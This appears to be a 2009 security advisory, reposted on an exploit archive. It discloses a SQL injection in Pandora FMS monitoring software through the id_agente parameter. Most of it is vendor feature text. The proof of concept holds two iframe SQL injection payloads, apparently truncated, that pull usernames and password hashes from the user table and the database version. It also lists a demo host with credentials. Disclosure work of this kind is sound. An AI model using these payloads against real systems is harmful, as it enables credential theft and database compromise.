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Pandora FMS Monitoring Z0D Vulnerability

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Pandora FMS Monitoring Z0D Vulnerability

PenTest Information:
GESEC Team(~smash & ~rem0ve) discover a SQL Injection Vulnerability on Pandora FMS Monitoring Software.
Attackers can manipulate the application DBMS over a remote sql-injection vulnerability.
Tested on OS:           UBUNTU 5.4
Tested with Software:       Mozilla Firefox 3.5.6
Vulnerable Products:        Pandora FMS Monitoring Application
Affected Versions:      v2.1.x & v3.x
Vulnerability Type:     SQL-Injection
Security-Risk:          Critical
Vendor-URL:             http://pandorafms.org/
Source-URL:         http://pandorafms.org/index.php?sec=project&sec2=downloads&lang=en
Vendor-Status:          Not Informed
Patch/Fix-Status:       Fixed version not released
Advisory-Status:        Published | 20.12.2009
UNPUBLIC Advisory-URL:      *
  PUBLIC Advisory-URL:      *
GE DB-ID:           820
CVE-ID:             ()
OSVDB-ID:           ()
Pandora FMS is a monitoring Open Source software. It watches your systems and applications, and allows you to
know the status of any element of those systems. Pandora FMS could detect a network interface down, a defacement
in your website, a memory leak in one of your server application, or the movement of any value of the NASDAQ
new technology market.
    * Detect new systems in network.
    * Checks for availability or performance.
    * Raise alerts when something goes wrong.
    * Allow to get data inside systems with its own lite agents (for almost every Operating System).
    * Allow to get data from outside, using only network probes. Including SNMP.
    * Get SNMP Traps from generic network devices.
    * Generate real time reports and graphics.
    * SLA reporting.
    * User defined graphical views.
    * Store data for months, ready to be used on reporting.
    * Real time graphs for every module.
    * High availability for each component.
    * Scalable and modular architecture.
    * Supports up to 2500 modules per server.
    * User defined alerts. Also could be used to react on incidents.
    * Integrated incident manager.
    * Integrated DB management: purge and DB compaction.
    * Multiuser, multi profile, multi group.
    * Event system with user validation for operation in teams.
    * Granularity of accesses and user profiles for each group and each user.
    * Profiles could be personalized using up to eight security attributes without limitation on groups or profiles.
Pandora FMS runs on any operating system, with specific agents for each platform, gathering data and sending it to a
server, it has specific agents for GNU/Linux, AIX, Solaris, HP-UX, BSD/IPSO, and Windows 2000, XP and 2003.
Demo:       http://artica.homelinux.com/pandora/index.php    (demo:demo)
(Copy from the Vendor's Homepage: http://pandorafms.org/index.php?sec=project&sec2=home&lang=en)
More Details
Attackers can execute SQL statements over the a not secured statement.
Vulnerable Modules:
            [+] Pandora Agents > Agent General information
Path:           /pandora/
File:           index.php
Para:           ?sec=estado&sec2=operation/agentes/ver_agente&id_agente=
[+] Screen:
Proof of Concept
The vulnerability can be exploited by attackers ...
<title>Pandora FMS Monitoring Application - v2.1.x & v3.x - SQL Injection Exploit</title>
<iframe src=,concat_ws%280x3a,id_usuario,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18%20FROM%20tusuario%20order%20by%202 width=500 height=500>
<iframe src=,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18%20order%20by%202 width=500 height=500>
Fix or Patch
Use a prepared statement to fix the sql vulnerability on pandora monitoring.
Security Risk
Attacks can compromise the application(DBMS) over a sql-injection through a not secure statement implementation.
The security risk of the sql vulnerability is estimated as critical.
The author & writer is part of "Global-Evolution" Security(GESEC).
GESEC Vulnerability-Research Team protects software, services, applications & informs the vendors on a secured base.
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#  0day.today [2024-09-28]  #